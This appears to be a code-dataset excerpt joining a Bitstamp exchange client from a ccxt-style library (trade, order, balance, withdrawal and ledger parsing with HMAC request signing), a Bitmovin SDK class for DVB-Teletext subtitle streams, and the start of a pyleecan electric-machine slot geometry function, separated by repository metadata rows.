def parse_trade(self, trade, market=None):
#
# fetchTrades(public)
#
# {
# "date": "1637845199",
# "tid": "209895701",
# "amount": "0.00500000",
# "type": "0", # Transaction type: 0 - buy; 1 - sell
# "price": "4451.25"
# }
#
# fetchMyTrades, trades returned within fetchOrder(private)
#
# {
# "fee": "0.11128",
# "eth_usdt": 4451.25,
# "datetime": "2021-11-25 12:59:59.322000",
# "usdt": "-22.26",
# "order_id": 1429545880227846,
# "usd": 0,
# "btc": 0,
# "eth": "0.00500000",
# "type": "2", # Transaction type: 0 - deposit; 1 - withdrawal; 2 - market trade; 14 - sub account transfer; 25 - credited with staked assets; 26 - sent assets to staking; 27 - staking reward; 32 - referral reward; 35 - inter account transfer.
# "id": 209895701,
# "eur": 0
# }
#
# from fetchOrder(private)
#
# {
# "fee": "0.11128",
# "price": "4451.25000000",
# "datetime": "2021-11-25 12:59:59.322000",
# "usdt": "22.25625000",
# "tid": 209895701,
# "eth": "0.00500000",
# "type": 2 # Transaction type: 0 - deposit; 1 - withdrawal; 2 - market trade
# }
#
id = self.safe_string_2(trade, 'id', 'tid')
symbol = None
side = None
priceString = self.safe_string(trade, 'price')
amountString = self.safe_string(trade, 'amount')
orderId = self.safe_string(trade, 'order_id')
type = None
costString = self.safe_string(trade, 'cost')
if market is None:
keys = list(trade.keys())
for i in range(0, len(keys)):
if keys[i].find('_') >= 0:
marketId = keys[i].replace('_', '')
if marketId in self.markets_by_id:
market = self.markets_by_id[marketId]
# if the market is still not defined
# try to deduce it from used keys
if market is None:
market = self.get_market_from_trade(trade)
feeCostString = self.safe_string(trade, 'fee')
feeCurrency = None
if market is not None:
priceString = self.safe_string(trade, market['marketId'], priceString)
amountString = self.safe_string(trade, market['baseId'], amountString)
costString = self.safe_string(trade, market['quoteId'], costString)
feeCurrency = market['quote']
symbol = market['symbol']
timestamp = self.safe_string_2(trade, 'date', 'datetime')
if timestamp is not None:
if timestamp.find(' ') >= 0:
# iso8601
timestamp = self.parse8601(timestamp)
else:
# string unix epoch in seconds
timestamp = int(timestamp)
timestamp = timestamp * 1000
# if it is a private trade
if 'id' in trade:
if amountString is not None:
isAmountNeg = Precise.string_lt(amountString, '0')
if isAmountNeg:
side = 'sell'
amountString = Precise.string_neg(amountString)
else:
side = 'buy'
else:
side = self.safe_string(trade, 'type')
if side == '1':
side = 'sell'
elif side == '0':
side = 'buy'
else:
side = None
if costString is not None:
costString = Precise.string_abs(costString)
fee = None
if feeCostString is not None:
fee = {
'cost': feeCostString,
'currency': feeCurrency,
}
return self.safe_trade({
'id': id,
'info': trade,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'order': orderId,
'type': type,
'side': side,
'takerOrMaker': None,
'price': priceString,
'amount': amountString,
'cost': costString,
'fee': fee,
}, market)
async def fetch_trades(self, symbol, since=None, limit=None, params={}):
await self.load_markets()
market = self.market(symbol)
request = {
'pair': market['id'],
'time': 'hour',
}
response = await self.publicGetTransactionsPair(self.extend(request, params))
#
# [
# {
# date: '1551814435',
# tid: '83581898',
# price: '0.03532850',
# type: '1',
# amount: '0.85945907'
# },
# {
# date: '1551814434',
# tid: '83581896',
# price: '0.03532851',
# type: '1',
# amount: '11.34130961'
# },
# ]
#
return self.parse_trades(response, market, since, limit)
def parse_ohlcv(self, ohlcv, market=None):
#
# {
# "high": "9064.77",
# "timestamp": "1593961440",
# "volume": "18.49436608",
# "low": "9040.87",
# "close": "9064.77",
# "open": "9040.87"
# }
#
return [
self.safe_timestamp(ohlcv, 'timestamp'),
self.safe_number(ohlcv, 'open'),
self.safe_number(ohlcv, 'high'),
self.safe_number(ohlcv, 'low'),
self.safe_number(ohlcv, 'close'),
self.safe_number(ohlcv, 'volume'),
]
async def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
await self.load_markets()
market = self.market(symbol)
request = {
'pair': market['id'],
'step': self.timeframes[timeframe],
}
duration = self.parse_timeframe(timeframe)
if limit is None:
if since is None:
raise ArgumentsRequired(self.id + ' fetchOHLCV() requires a since argument or a limit argument')
else:
limit = 1000
start = int(since / 1000)
request['start'] = start
request['end'] = self.sum(start, limit * duration)
request['limit'] = limit
else:
if since is not None:
start = int(since / 1000)
request['start'] = start
request['end'] = self.sum(start, limit * duration)
request['limit'] = min(limit, 1000) # min 1, max 1000
response = await self.publicGetOhlcPair(self.extend(request, params))
#
# {
# "data": {
# "pair": "BTC/USD",
# "ohlc": [
# {"high": "9064.77", "timestamp": "1593961440", "volume": "18.49436608", "low": "9040.87", "close": "9064.77", "open": "9040.87"},
# {"high": "9071.59", "timestamp": "1593961500", "volume": "3.48631711", "low": "9058.76", "close": "9061.07", "open": "9064.66"},
# {"high": "9067.33", "timestamp": "1593961560", "volume": "0.04142833", "low": "9061.94", "close": "9061.94", "open": "9067.33"},
# ],
# }
# }
#
data = self.safe_value(response, 'data', {})
ohlc = self.safe_value(data, 'ohlc', [])
return self.parse_ohlcvs(ohlc, market, timeframe, since, limit)
def parse_balance(self, response):
result = {
'info': response,
'timestamp': None,
'datetime': None,
}
codes = list(self.currencies.keys())
for i in range(0, len(codes)):
code = codes[i]
currency = self.currency(code)
currencyId = currency['id']
account = self.account()
account['free'] = self.safe_string(response, currencyId + '_available')
account['used'] = self.safe_string(response, currencyId + '_reserved')
account['total'] = self.safe_string(response, currencyId + '_balance')
result[code] = account
return self.safe_balance(result)
async def fetch_balance(self, params={}):
await self.load_markets()
response = await self.privatePostBalance(params)
#
# {
# "aave_available": "0.00000000",
# "aave_balance": "0.00000000",
# "aave_reserved": "0.00000000",
# "aave_withdrawal_fee": "0.07000000",
# "aavebtc_fee": "0.000",
# "aaveeur_fee": "0.000",
# "aaveusd_fee": "0.000",
# "bat_available": "0.00000000",
# "bat_balance": "0.00000000",
# "bat_reserved": "0.00000000",
# "bat_withdrawal_fee": "5.00000000",
# "batbtc_fee": "0.000",
# "bateur_fee": "0.000",
# "batusd_fee": "0.000",
# }
#
return self.parse_balance(response)
async def fetch_trading_fee(self, symbol, params={}):
await self.load_markets()
market = self.market(symbol)
request = {
'pair': market['id'],
}
response = await self.privatePostBalancePair(self.extend(request, params))
return self.parse_trading_fee(response, market)
def parse_trading_fee(self, fee, market=None):
market = self.safe_market(None, market)
feeString = self.safe_string(fee, market['id'] + '_fee')
dividedFeeString = Precise.string_div(feeString, '100')
tradeFee = self.parse_number(dividedFeeString)
return {
'info': fee,
'symbol': market['symbol'],
'maker': tradeFee,
'taker': tradeFee,
}
def parse_trading_fees(self, fees):
result = {'info': fees}
symbols = self.symbols
for i in range(0, len(symbols)):
symbol = symbols[i]
market = self.market(symbol)
fee = self.parse_trading_fee(fees, market)
result[symbol] = fee
return result
async def fetch_trading_fees(self, params={}):
await self.load_markets()
response = await self.privatePostBalance(params)
return self.parse_trading_fees(response)
def parse_funding_fees(self, balance):
withdraw = {}
ids = list(balance.keys())
for i in range(0, len(ids)):
id = ids[i]
if id.find('_withdrawal_fee') >= 0:
currencyId = id.split('_')[0]
code = self.safe_currency_code(currencyId)
withdraw[code] = self.safe_number(balance, id)
return {
'info': balance,
'withdraw': withdraw,
'deposit': {},
}
async def fetch_funding_fees(self, params={}):
await self.load_markets()
balance = await self.privatePostBalance(params)
return self.parse_funding_fees(balance)
async def create_order(self, symbol, type, side, amount, price=None, params={}):
await self.load_markets()
market = self.market(symbol)
method = 'privatePost' + self.capitalize(side)
request = {
'pair': market['id'],
'amount': self.amount_to_precision(symbol, amount),
}
if type == 'market':
method += 'Market'
elif type == 'instant':
method += 'Instant'
else:
request['price'] = self.price_to_precision(symbol, price)
method += 'Pair'
clientOrderId = self.safe_string_2(params, 'client_order_id', 'clientOrderId')
if clientOrderId is not None:
request['client_order_id'] = clientOrderId
params = self.omit(params, ['client_order_id', 'clientOrderId'])
response = await getattr(self, method)(self.extend(request, params))
order = self.parse_order(response, market)
return self.extend(order, {
'type': type,
})
async def cancel_order(self, id, symbol=None, params={}):
await self.load_markets()
request = {
'id': id,
}
return await self.privatePostCancelOrder(self.extend(request, params))
async def cancel_all_orders(self, symbol=None, params={}):
await self.load_markets()
market = None
request = {}
method = 'privatePostCancelAllOrders'
if symbol is not None:
market = self.market(symbol)
request['pair'] = market['id']
method = 'privatePostCancelAllOrdersPair'
return await getattr(self, method)(self.extend(request, params))
def parse_order_status(self, status):
statuses = {
'In Queue': 'open',
'Open': 'open',
'Finished': 'closed',
'Canceled': 'canceled',
}
return self.safe_string(statuses, status, status)
async def fetch_order_status(self, id, symbol=None, params={}):
await self.load_markets()
clientOrderId = self.safe_value_2(params, 'client_order_id', 'clientOrderId')
request = {}
if clientOrderId is not None:
request['client_order_id'] = clientOrderId
params = self.omit(params, ['client_order_id', 'clientOrderId'])
else:
request['id'] = id
response = await self.privatePostOrderStatus(self.extend(request, params))
return self.parse_order_status(self.safe_string(response, 'status'))
async def fetch_order(self, id, symbol=None, params={}):
await self.load_markets()
market = None
if symbol is not None:
market = self.market(symbol)
clientOrderId = self.safe_value_2(params, 'client_order_id', 'clientOrderId')
request = {}
if clientOrderId is not None:
request['client_order_id'] = clientOrderId
params = self.omit(params, ['client_order_id', 'clientOrderId'])
else:
request['id'] = id
response = await self.privatePostOrderStatus(self.extend(request, params))
#
# {
# "status": "Finished",
# "id": 1429545880227846,
# "amount_remaining": "0.00000000",
# "transactions": [
# {
# "fee": "0.11128",
# "price": "4451.25000000",
# "datetime": "2021-11-25 12:59:59.322000",
# "usdt": "22.25625000",
# "tid": 209895701,
# "eth": "0.00500000",
# "type": 2
# }
# ]
# }
#
return self.parse_order(response, market)
async def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):
await self.load_markets()
request = {}
method = 'privatePostUserTransactions'
market = None
if symbol is not None:
market = self.market(symbol)
request['pair'] = market['id']
method += 'Pair'
if limit is not None:
request['limit'] = limit
response = await getattr(self, method)(self.extend(request, params))
result = self.filter_by(response, 'type', '2')
return self.parse_trades(result, market, since, limit)
async def fetch_transactions(self, code=None, since=None, limit=None, params={}):
await self.load_markets()
request = {}
if limit is not None:
request['limit'] = limit
response = await self.privatePostUserTransactions(self.extend(request, params))
#
# [
# {
# "fee": "0.00000000",
# "btc_usd": "0.00",
# "id": 1234567894,
# "usd": 0,
# "btc": 0,
# "datetime": "2018-09-08 09:00:31",
# "type": "1",
# "xrp": "-20.00000000",
# "eur": 0,
# },
# {
# "fee": "0.00000000",
# "btc_usd": "0.00",
# "id": 1134567891,
# "usd": 0,
# "btc": 0,
# "datetime": "2018-09-07 18:47:52",
# "type": "0",
# "xrp": "20.00000000",
# "eur": 0,
# },
# ]
#
currency = None
if code is not None:
currency = self.currency(code)
transactions = self.filter_by_array(response, 'type', ['0', '1'], False)
return self.parse_transactions(transactions, currency, since, limit)
async def fetch_withdrawals(self, code=None, since=None, limit=None, params={}):
await self.load_markets()
request = {}
if since is not None:
request['timedelta'] = self.milliseconds() - since
else:
request['timedelta'] = 50000000 # use max bitstamp approved value
response = await self.privatePostWithdrawalRequests(self.extend(request, params))
#
# [
# {
# status: 2,
# datetime: '2018-10-17 10:58:13',
# currency: 'BTC',
# amount: '0.29669259',
# address: 'aaaaa',
# type: 1,
# id: 111111,
# transaction_id: 'xxxx',
# },
# {
# status: 2,
# datetime: '2018-10-17 10:55:17',
# currency: 'ETH',
# amount: '1.11010664',
# address: 'aaaa',
# type: 16,
# id: 222222,
# transaction_id: 'xxxxx',
# },
# ]
#
return self.parse_transactions(response, None, since, limit)
def parse_transaction(self, transaction, currency=None):
#
# fetchTransactions
#
# {
# "fee": "0.00000000",
# "btc_usd": "0.00",
# "id": 1234567894,
# "usd": 0,
# "btc": 0,
# "datetime": "2018-09-08 09:00:31",
# "type": "1",
# "xrp": "-20.00000000",
# "eur": 0,
# }
#
# fetchWithdrawals
#
# {
# status: 2,
# datetime: '2018-10-17 10:58:13',
# currency: 'BTC',
# amount: '0.29669259',
# address: 'aaaaa',
# type: 1,
# id: 111111,
# transaction_id: 'xxxx',
# }
#
# {
# "id": 3386432,
# "type": 14,
# "amount": "863.21332500",
# "status": 2,
# "address": "rE1sdh25BJQ3qFwngiTBwaq3zPGGYcrjp1?dt=1455",
# "currency": "XRP",
# "datetime": "2018-01-05 15:27:55",
# "transaction_id": "001743B03B0C79BA166A064AC0142917B050347B4CB23BA2AB4B91B3C5608F4C"
# }
#
timestamp = self.parse8601(self.safe_string(transaction, 'datetime'))
id = self.safe_string(transaction, 'id')
currencyId = self.get_currency_id_from_transaction(transaction)
code = self.safe_currency_code(currencyId, currency)
feeCost = self.safe_number(transaction, 'fee')
feeCurrency = None
amount = None
if 'amount' in transaction:
amount = self.safe_number(transaction, 'amount')
elif currency is not None:
amount = self.safe_number(transaction, currency['id'], amount)
feeCurrency = currency['code']
elif (code is not None) and (currencyId is not None):
amount = self.safe_number(transaction, currencyId, amount)
feeCurrency = code
if amount is not None:
# withdrawals have a negative amount
amount = abs(amount)
status = 'ok'
if 'status' in transaction:
status = self.parse_transaction_status(self.safe_string(transaction, 'status'))
type = None
if 'type' in transaction:
# from fetchTransactions
rawType = self.safe_string(transaction, 'type')
if rawType == '0':
type = 'deposit'
elif rawType == '1':
type = 'withdrawal'
else:
# from fetchWithdrawals
type = 'withdrawal'
txid = self.safe_string(transaction, 'transaction_id')
tag = None
address = self.safe_string(transaction, 'address')
if address is not None:
# dt(destination tag) is embedded into the address field
addressParts = address.split('?dt=')
numParts = len(addressParts)
if numParts > 1:
address = addressParts[0]
tag = addressParts[1]
addressFrom = None
addressTo = address
tagFrom = None
tagTo = tag
fee = None
if feeCost is not None:
fee = {
'currency': feeCurrency,
'cost': feeCost,
'rate': None,
}
return {
'info': transaction,
'id': id,
'txid': txid,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'network': None,
'addressFrom': addressFrom,
'addressTo': addressTo,
'address': address,
'tagFrom': tagFrom,
'tagTo': tagTo,
'tag': tag,
'type': type,
'amount': amount,
'currency': code,
'status': status,
'updated': None,
'fee': fee,
}
def parse_transaction_status(self, status):
# withdrawals:
# 0(open), 1(in process), 2(finished), 3(canceled) or 4(failed).
statuses = {
'0': 'pending', # Open
'1': 'pending', # In process
'2': 'ok', # Finished
'3': 'canceled', # Canceled
'4': 'failed', # Failed
}
return self.safe_string(statuses, status, status)
def parse_order(self, order, market=None):
# from fetch order:
# {status: 'Finished',
# id: 731693945,
# client_order_id: '',
# transactions:
# [{fee: '0.000019',
# price: '0.00015803',
# datetime: '2018-01-07 10:45:34.132551',
# btc: '0.0079015000000000',
# tid: 42777395,
# type: 2,
# xrp: '50.00000000'}]}
#
# partially filled order:
# {"id": 468646390,
# "client_order_id": "",
# "status": "Canceled",
# "transactions": [{
# "eth": "0.23000000",
# "fee": "0.09",
# "tid": 25810126,
# "usd": "69.8947000000000000",
# "type": 2,
# "price": "303.89000000",
# "datetime": "2017-11-11 07:22:20.710567"
# }]}
#
# from create order response:
# {
# price: '0.00008012',
# client_order_id: '',
# currency_pair: 'XRP/BTC',
# datetime: '2019-01-31 21:23:36',
# amount: '15.00000000',
# type: '0',
# id: '2814205012'
# }
#
id = self.safe_string(order, 'id')
clientOrderId = self.safe_string(order, 'client_order_id')
side = self.safe_string(order, 'type')
if side is not None:
side = 'sell' if (side == '1') else 'buy'
# there is no timestamp from fetchOrder
timestamp = self.parse8601(self.safe_string(order, 'datetime'))
marketId = self.safe_string_lower(order, 'currency_pair')
symbol = self.safe_symbol(marketId, market, '/')
status = self.parse_order_status(self.safe_string(order, 'status'))
amount = self.safe_string(order, 'amount')
transactions = self.safe_value(order, 'transactions', [])
price = self.safe_string(order, 'price')
return self.safe_order({
'id': id,
'clientOrderId': clientOrderId,
'datetime': self.iso8601(timestamp),
'timestamp': timestamp,
'lastTradeTimestamp': None,
'status': status,
'symbol': symbol,
'type': None,
'timeInForce': None,
'postOnly': None,
'side': side,
'price': price,
'stopPrice': None,
'cost': None,
'amount': amount,
'filled': None,
'remaining': None,
'trades': transactions,
'fee': None,
'info': order,
'average': None,
}, market)
def parse_ledger_entry_type(self, type):
types = {
'0': 'transaction',
'1': 'transaction',
'2': 'trade',
'14': 'transfer',
}
return self.safe_string(types, type, type)
def parse_ledger_entry(self, item, currency=None):
#
# [
# {
# "fee": "0.00000000",
# "btc_usd": "0.00",
# "id": 1234567894,
# "usd": 0,
# "btc": 0,
# "datetime": "2018-09-08 09:00:31",
# "type": "1",
# "xrp": "-20.00000000",
# "eur": 0,
# },
# {
# "fee": "0.00000000",
# "btc_usd": "0.00",
# "id": 1134567891,
# "usd": 0,
# "btc": 0,
# "datetime": "2018-09-07 18:47:52",
# "type": "0",
# "xrp": "20.00000000",
# "eur": 0,
# },
# ]
#
type = self.parse_ledger_entry_type(self.safe_string(item, 'type'))
if type == 'trade':
parsedTrade = self.parse_trade(item)
market = None
keys = list(item.keys())
for i in range(0, len(keys)):
if keys[i].find('_') >= 0:
marketId = keys[i].replace('_', '')
if marketId in self.markets_by_id:
market = self.markets_by_id[marketId]
# if the market is still not defined
# try to deduce it from used keys
if market is None:
market = self.get_market_from_trade(item)
direction = 'in' if (parsedTrade['side'] == 'buy') else 'out'
return {
'id': parsedTrade['id'],
'info': item,
'timestamp': parsedTrade['timestamp'],
'datetime': parsedTrade['datetime'],
'direction': direction,
'account': None,
'referenceId': parsedTrade['order'],
'referenceAccount': None,
'type': type,
'currency': market['base'],
'amount': parsedTrade['amount'],
'before': None,
'after': None,
'status': 'ok',
'fee': parsedTrade['fee'],
}
else:
parsedTransaction = self.parse_transaction(item, currency)
direction = None
if 'amount' in item:
amount = self.safe_number(item, 'amount')
direction = 'in' if (amount > 0) else 'out'
elif ('currency' in parsedTransaction) and parsedTransaction['currency'] is not None:
currencyCode = self.safe_string(parsedTransaction, 'currency')
currency = self.currency(currencyCode)
amount = self.safe_number(item, currency['id'])
direction = 'in' if (amount > 0) else 'out'
return {
'id': parsedTransaction['id'],
'info': item,
'timestamp': parsedTransaction['timestamp'],
'datetime': parsedTransaction['datetime'],
'direction': direction,
'account': None,
'referenceId': parsedTransaction['txid'],
'referenceAccount': None,
'type': type,
'currency': parsedTransaction['currency'],
'amount': parsedTransaction['amount'],
'before': None,
'after': None,
'status': parsedTransaction['status'],
'fee': parsedTransaction['fee'],
}
async def fetch_ledger(self, code=None, since=None, limit=None, params={}):
await self.load_markets()
request = {}
if limit is not None:
request['limit'] = limit
response = await self.privatePostUserTransactions(self.extend(request, params))
currency = None
if code is not None:
currency = self.currency(code)
return self.parse_ledger(response, currency, since, limit)
async def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
market = None
await self.load_markets()
if symbol is not None:
market = self.market(symbol)
response = await self.privatePostOpenOrdersAll(params)
# [
# {
# price: '0.00008012',
# currency_pair: 'XRP/BTC',
# client_order_id: '',
# datetime: '2019-01-31 21:23:36',
# amount: '15.00000000',
# type: '0',
# id: '2814205012',
# }
# ]
#
return self.parse_orders(response, market, since, limit, {
'status': 'open',
'type': 'limit',
})
def get_currency_name(self, code):
return code.lower()
def is_fiat(self, code):
return code == 'USD' or code == 'EUR' or code == 'GBP'
async def fetch_deposit_address(self, code, params={}):
if self.is_fiat(code):
raise NotSupported(self.id + ' fiat fetchDepositAddress() for ' + code + ' is not supported!')
name = self.get_currency_name(code)
method = 'privatePost' + self.capitalize(name) + 'Address'
response = await getattr(self, method)(params)
address = self.safe_string(response, 'address')
tag = self.safe_string_2(response, 'memo_id', 'destination_tag')
self.check_address(address)
return {
'currency': code,
'address': address,
'tag': tag,
'network': None,
'info': response,
}
async def withdraw(self, code, amount, address, tag=None, params={}):
# For fiat withdrawals please provide all required additional parameters in the 'params'
# Check https://www.bitstamp.net/api/ under 'Open bank withdrawal' for list and description.
tag, params = self.handle_withdraw_tag_and_params(tag, params)
await self.load_markets()
self.check_address(address)
request = {
'amount': amount,
}
currency = None
method = None
if not self.is_fiat(code):
name = self.get_currency_name(code)
method = 'privatePost' + self.capitalize(name) + 'Withdrawal'
if code == 'XRP':
if tag is not None:
request['destination_tag'] = tag
elif code == 'XLM' or code == 'HBAR':
if tag is not None:
request['memo_id'] = tag
request['address'] = address
else:
method = 'privatePostWithdrawalOpen'
currency = self.currency(code)
request['iban'] = address
request['account_currency'] = currency['id']
response = await getattr(self, method)(self.extend(request, params))
return self.parse_transaction(response, currency)
def nonce(self):
return self.milliseconds()
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'][api] + '/'
url += self.version + '/'
url += self.implode_params(path, params)
query = self.omit(params, self.extract_params(path))
if api == 'public':
if query:
url += '?' + self.urlencode(query)
else:
self.check_required_credentials()
xAuth = 'BITSTAMP ' + self.apiKey
xAuthNonce = self.uuid()
xAuthTimestamp = str(self.milliseconds())
xAuthVersion = 'v2'
contentType = ''
headers = {
'X-Auth': xAuth,
'X-Auth-Nonce': xAuthNonce,
'X-Auth-Timestamp': xAuthTimestamp,
'X-Auth-Version': xAuthVersion,
}
if method == 'POST':
if query:
body = self.urlencode(query)
contentType = 'application/x-www-form-urlencoded'
headers['Content-Type'] = contentType
else:
# sending an empty POST request will trigger
# an API0020 error returned by the exchange
# therefore for empty requests we send a dummy object
# https://github.com/ccxt/ccxt/issues/6846
body = self.urlencode({'foo': 'bar'})
contentType = 'application/x-www-form-urlencoded'
headers['Content-Type'] = contentType
authBody = body if body else ''
auth = xAuth + method + url.replace('https://', '') + contentType + xAuthNonce + xAuthTimestamp + xAuthVersion + authBody
signature = self.hmac(self.encode(auth), self.encode(self.secret))
headers['X-Auth-Signature'] = signature
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def handle_errors(self, httpCode, reason, url, method, headers, body, response, requestHeaders, requestBody):
if response is None:
return
#
# {"error": "No permission found"} # fetchDepositAddress returns self on apiKeys that don't have the permission required
# {"status": "error", "reason": {"__all__": ["Minimum order size is 5.0 EUR."]}}
# reuse of a nonce gives: {status: 'error', reason: 'Invalid nonce', code: 'API0004'}
status = self.safe_string(response, 'status')
error = self.safe_value(response, 'error')
if (status == 'error') or (error is not None):
errors = []
if isinstance(error, str):
errors.append(error)
elif error is not None:
keys = list(error.keys())
for i in range(0, len(keys)):
key = keys[i]
value = self.safe_value(error, key)
if isinstance(value, list):
errors = self.array_concat(errors, value)
else:
errors.append(value)
reason = self.safe_value(response, 'reason', {})
if isinstance(reason, str):
errors.append(reason)
else:
all = self.safe_value(reason, '__all__', [])
for i in range(0, len(all)):
errors.append(all[i])
code = self.safe_string(response, 'code')
if code == 'API0005':
raise AuthenticationError(self.id + ' invalid signature, use the uid for the main account if you have subaccounts')
feedback = self.id + ' ' + body
for i in range(0, len(errors)):
value = errors[i]
self.throw_exactly_matched_exception(self.exceptions['exact'], value, feedback)
self.throw_broadly_matched_exception(self.exceptions['broad'], value, feedback)
raise ExchangeError(feedback)
| 40.501832
| 279
| 0.458759
|
f424e4da64f09e94ce31d4d87005b5c24a66de08
| 4,319
|
py
|
Python
|
bitmovin_api_sdk/encoding/encodings/input_streams/subtitles/dvb_teletext/dvb_teletext_api.py
|
jaythecaesarean/bitmovin-api-sdk-python
|
48166511fcb9082041c552ace55a9b66cc59b794
|
[
"MIT"
] | 11
|
2019-07-03T10:41:16.000Z
|
2022-02-25T21:48:06.000Z
|
bitmovin_api_sdk/encoding/encodings/input_streams/subtitles/dvb_teletext/dvb_teletext_api.py
|
jaythecaesarean/bitmovin-api-sdk-python
|
48166511fcb9082041c552ace55a9b66cc59b794
|
[
"MIT"
] | 8
|
2019-11-23T00:01:25.000Z
|
2021-04-29T12:30:31.000Z
|
bitmovin_api_sdk/encoding/encodings/input_streams/subtitles/dvb_teletext/dvb_teletext_api.py
|
jaythecaesarean/bitmovin-api-sdk-python
|
48166511fcb9082041c552ace55a9b66cc59b794
|
[
"MIT"
] | 13
|
2020-01-02T14:58:18.000Z
|
2022-03-26T12:10:30.000Z
|
# coding: utf-8
from __future__ import absolute_import
from bitmovin_api_sdk.common import BaseApi, BitmovinApiLoggerBase
from bitmovin_api_sdk.common.poscheck import poscheck_except
from bitmovin_api_sdk.models.bitmovin_response import BitmovinResponse
from bitmovin_api_sdk.models.dvb_teletext_input_stream import DvbTeletextInputStream
from bitmovin_api_sdk.models.response_envelope import ResponseEnvelope
from bitmovin_api_sdk.models.response_error import ResponseError
from bitmovin_api_sdk.encoding.encodings.input_streams.subtitles.dvb_teletext.dvb_teletext_input_stream_list_query_params import DvbTeletextInputStreamListQueryParams
class DvbTeletextApi(BaseApi):
@poscheck_except(2)
def __init__(self, api_key, tenant_org_id=None, base_url=None, logger=None):
# type: (str, str, str, BitmovinApiLoggerBase) -> None
super(DvbTeletextApi, self).__init__(
api_key=api_key,
tenant_org_id=tenant_org_id,
base_url=base_url,
logger=logger
)
def create(self, encoding_id, dvb_teletext_input_stream, **kwargs):
# type: (string_types, DvbTeletextInputStream, dict) -> DvbTeletextInputStream
"""Add DVB-Teletext Input Stream
:param encoding_id: Id of the encoding.
:type encoding_id: string_types, required
:param dvb_teletext_input_stream: The DVB-Teletext Input Stream to be created
:type dvb_teletext_input_stream: DvbTeletextInputStream, required
:return: DVB-Teletext Input Stream
:rtype: DvbTeletextInputStream
"""
return self.api_client.post(
'/encoding/encodings/{encoding_id}/input-streams/subtitles/dvb-teletext',
dvb_teletext_input_stream,
path_params={'encoding_id': encoding_id},
type=DvbTeletextInputStream,
**kwargs
)
def delete(self, encoding_id, input_stream_id, **kwargs):
# type: (string_types, string_types, dict) -> BitmovinResponse
"""Delete DVB-Teletext Input Stream
:param encoding_id: Id of the encoding.
:type encoding_id: string_types, required
:param input_stream_id: Id of the DVB-Teletext input stream.
:type input_stream_id: string_types, required
:return: Id of the DVB-Teletext Input stream
:rtype: BitmovinResponse
"""
return self.api_client.delete(
'/encoding/encodings/{encoding_id}/input-streams/subtitles/dvb-teletext/{input_stream_id}',
path_params={'encoding_id': encoding_id, 'input_stream_id': input_stream_id},
type=BitmovinResponse,
**kwargs
)
def get(self, encoding_id, input_stream_id, **kwargs):
# type: (string_types, string_types, dict) -> DvbTeletextInputStream
"""DVB-Teletext Input Stream Details
:param encoding_id: Id of the encoding.
:type encoding_id: string_types, required
:param input_stream_id: Id of the DVB-Teletext input stream.
:type input_stream_id: string_types, required
:return: DVB-Teletext Input Stream
:rtype: DvbTeletextInputStream
"""
return self.api_client.get(
'/encoding/encodings/{encoding_id}/input-streams/subtitles/dvb-teletext/{input_stream_id}',
path_params={'encoding_id': encoding_id, 'input_stream_id': input_stream_id},
type=DvbTeletextInputStream,
**kwargs
)
def list(self, encoding_id, query_params=None, **kwargs):
# type: (string_types, DvbTeletextInputStreamListQueryParams, dict) -> DvbTeletextInputStream
"""List DVB-Teletext Input Streams
:param encoding_id: Id of the encoding.
:type encoding_id: string_types, required
:param query_params: Query parameters
:type query_params: DvbTeletextInputStreamListQueryParams
:return: List of DVB-Teletext Input Streams
:rtype: DvbTeletextInputStream
"""
return self.api_client.get(
'/encoding/encodings/{encoding_id}/input-streams/subtitles/dvb-teletext',
path_params={'encoding_id': encoding_id},
query_params=query_params,
pagination_response=True,
type=DvbTeletextInputStream,
**kwargs
)
| 41.528846
| 166
| 0.693448
|
55b444075dea2be0072acdd8a4545d953a852d4a
| 2,267
|
py
|
Python
|
pyleecan/Methods/Slot/SlotW15/_comp_point_coordinate.py
|
ajpina/pyleecan
|
f8d1fce7d108cf443f5767e35d59ff15905fb49f
|
[
"Apache-2.0"
] | 2
|
2019-06-08T15:04:39.000Z
|
2020-09-07T13:32:22.000Z
|
pyleecan/Methods/Slot/SlotW15/_comp_point_coordinate.py
|
ajpina/pyleecan
|
f8d1fce7d108cf443f5767e35d59ff15905fb49f
|
[
"Apache-2.0"
] | null | null | null |
pyleecan/Methods/Slot/SlotW15/_comp_point_coordinate.py
|
ajpina/pyleecan
|
f8d1fce7d108cf443f5767e35d59ff15905fb49f
|
[
"Apache-2.0"
] | null | null | null |
from numpy import angle, arcsin, arctan, cos, exp, pi, sin, sqrt
from ....Methods.Slot.SlotW15 import S15InnerError
def _comp_point_coordinate(self):
"""Compute the point coordinates needed to plot the Slot.
Parameters
----------
self : SlotW15
A SlotW15 object
Returns
-------
point_list: list
A list of 12 Points
"""
Rbo = self.get_Rbo()
# alpha is the angle to rotate Z0 so ||Z1,Z13|| = W0
alpha = arcsin(self.W0 / (2 * Rbo))
hsp = pi / self.Zs # Half slot pitch
Z0 = Rbo * exp(1j * 0)
Z1 = Z0 * exp(1j * alpha)
if self.is_outwards():
Z2 = Z0 + self.H0 + 1j * Z1.imag
Z7 = Z0 + self.H0 + self.H1 + self.H2
# Zc2, Z6 and (0,0) are align (tangent) => abs(Zc2)=Rbo+H0+H1+H2-R2
# In tooth ref: Im(Zc2') = -W3/2 - R2
A = Rbo + self.H0 + self.H1 + self.H2 - self.R2
B = -self.W3 / 2 - self.R2
xc2 = B * sin(-hsp) + sqrt(-(B ** 2) + A ** 2) * cos(-hsp)
yc2 = B * cos(-hsp) - sqrt(-(B ** 2) + A ** 2) * sin(-hsp)
Zc2 = xc2 + 1j * yc2
Z5 = (Zc2 * exp(1j * -hsp) + self.R2 * 1j) * exp(1j * hsp)
# Zc2, Z6 and (0,0) are align, |Zc2, Z6| = R2
Z6 = (Zc2 * exp(1j * -angle(Zc2)) + self.R2) * exp(1j * angle(Zc2))
# Real(Zc1) = Rbo+H0+H1
# In tooth ref: Im(Zc1') = -W3/2 - R1
xc1 = Rbo + self.H0 + self.H1
yc1 = (-self.W3 / 2 - self.R1 - xc1 * sin(-hsp)) / cos(-hsp)
Zc1 = xc1 + 1j * yc1
Z4 = (Zc1 * exp(1j * -hsp) + self.R1 * 1j) * exp(1j * hsp)
# Ref center at Zc1, (Z3,Z2) and (Z3,Zc1) are orthogonal
